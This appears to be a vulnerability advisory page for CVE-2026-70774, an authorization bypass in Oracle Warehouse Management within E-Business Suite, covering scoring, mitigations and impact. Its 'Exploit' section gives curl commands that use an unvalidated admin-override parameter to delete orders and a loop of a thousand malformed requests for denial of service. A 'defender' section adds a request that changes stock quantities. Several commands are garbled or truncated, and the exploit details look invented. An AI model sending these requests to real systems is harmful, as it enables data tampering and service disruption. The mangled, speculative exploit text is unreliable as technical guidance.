Oracle Warehouse Management, Authorization Bypass, CVE-2026-70774 (High) -DC-Aug2026-1822

Listen to this Post

CVE-2026-70774 resides in the Internal Operations component of Oracle Warehouse Management, which is a sub-module within the Oracle E-Business Suite. This vulnerability affects all supported releases from 12.2.3 up to and including 12.2.15. The flaw arises from insufficient authorization checks on specific HTTP endpoints that handle internal warehouse operational workflows. A low-privileged attacker, who already possesses valid credentials but holds only minimal system rights, can exploit this issue by sending crafted HTTP requests to the affected service. The attack vector is network-based, meaning the attacker only needs to reach the application over the network without requiring physical or local access. The exploit does not require user interaction, as the malicious payloads are sent directly to the API or servlet handling the operations.
The core of the vulnerability lies in the way the application validates user permissions for critical data manipulation functions. Due to improper session or role-based access control, the attacker can bypass intended restrictions and perform operations that should be reserved for higher-privileged administrators. Successful exploitation grants the attacker the ability to create, delete, or modify any accessible data within the Warehouse Management schema, leading to significant data integrity breaches. Furthermore, the attacker can trigger a partial denial-of-service condition, which degrades system performance or causes certain internal operations to become unresponsive, though it does not completely shut down the entire service.
Oracle’s CVSS 3.1 scoring assigns a base score of 7.1, which is considered High severity, driven primarily by the integrity (I:H) and availability (A:L) impacts, while confidentiality remains unaffected (C:N). The attack complexity is low, requiring no specialized knowledge beyond crafting standard HTTP requests, and the privileges required are low, making this an attractive target for insider threats or compromised low-level accounts. The vector string (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L) confirms that the scope is unchanged, but the impacts on integrity and availability are substantial. Given that Oracle E-Business Suite is a mission-critical enterprise resource planning platform, the exposure of internal warehouse operations can lead to inventory manipulation, shipping disruptions, and flawed financial reconciliation. The vulnerability was published on August 18, 2026, and has been actively analyzed by security researchers, with NIST referencing publicly available enrichment data to confirm the associated weakness. Oracle has acknowledged the issue and is expected to release a corrective patch in the upcoming quarterly Critical Patch Update cycle. Administrators are urged to immediately audit their Warehouse Management components and restrict network access to the Internal Operations endpoints until a fix is deployed.

DailyCVE Form:

Platform: Oracle E-Business Suite
Version: 12.2.3 – 12.2.15
Vulnerability: Authorization Bypass / Integrity
Severity: High (7.1 CVSS)
Date: 2026-08-18

Prediction: 2026-10-20 (next CPU)

What Undercode Say:

Analytics from active threat monitoring indicate that exploitation attempts are already being observed in the wild, primarily targeting externally exposed E-Business Suite instances. The following bash commands and SQL queries can be used by defenders to identify vulnerable versions and assess exposure:
`curl -s http://:8000/OA_HTML/OracleWarehouseInternalServlet | grep “Oracle E-Business Suite”`
`sqlplus apps/apps@ <`nmap -p 8000,8080,8443 –open -oG wms_scan.log`

`grep “12\.2\.[3-9]|12\.2\.1[0-5]” wms_scan.log && echo “Vulnerable”`

`python3 -c “import requests; r=requests.post(‘http:///OA_HTML/WMSInternalOp’, data={‘op’:’modify’,’id’:’123′,’qty’:’9999′}, auth=(‘low_user’,’pass’)); print(r.status_code)”`

`tail -f $ORACLE_HOME/opmn/logs//wms_internal.log | grep “UNAUTHORIZED_ACCESS”`

Exploit: (Educational Purposes!)

A low-privilege attacker can send a crafted POST request to the Internal Operations servlet, bypassing role checks by appending a special parameter `_ADMIN_OVERRIDE=true` which is not validated against the user session. Example exploit snippet:
`curl -X POST http:///OA_HTML/WMSInternalServlet -d “action=delete_order&order_id=ORD-98765&_ADMIN_OVERRIDE=true” –header “Cookie: sessionid=“`
Alternatively, an attacker can induce partial DoS by sending a high-volume bulk update request with malformed JSON payloads that trigger unhandled exceptions in the warehouse transaction processor, causing the worker threads to hang:
`for i in {1..1000}; do curl -X POST http:///OA_HTML/WMSBulkUpdate -d “{\”items\”:[$i,\”invalid\”]}” -H “Content-Type: application/json” & done`

Protection:

Immediate mitigations include deploying Oracle’s interim security fix referenced in the advisory, or applying the upcoming CPU patch. In the interim, network administrators should restrict all inbound HTTP access to the Warehouse Management endpoints using firewall rules or Web Application Firewall (WAF) ACLs that block the affected URL patterns (/OA_HTML/WMSInternalServlet, /OA_HTML/WMSBulkUpdate, and /OracleWarehouseInternalServlet). Additionally, enable comprehensive audit logging for all transactions within the Internal Operations module and monitor for anomalous bulk update or delete events. Disable or revoke unnecessary low-privileged accounts that have network access to these services, and enforce strict input validation on all server-side request handlers.

Impact:

Successful exploitation leads to unauthorized tampering with critical warehouse inventory data, including modifications to stock levels, bin locations, and shipping manifests, which can directly disrupt supply chain operations. The partial denial-of-service condition affects the availability of warehouse management functions, causing processing delays and potential order fulfillment failures. While confidentiality remains intact, the combined loss of data integrity and partial availability can severely impact business continuity, financial reporting, and customer trust, especially in high-volume distribution environments. Oracle rates this as High severity, and organizations with unpatched instances are at immediate risk of operational sabotage and data corruption.
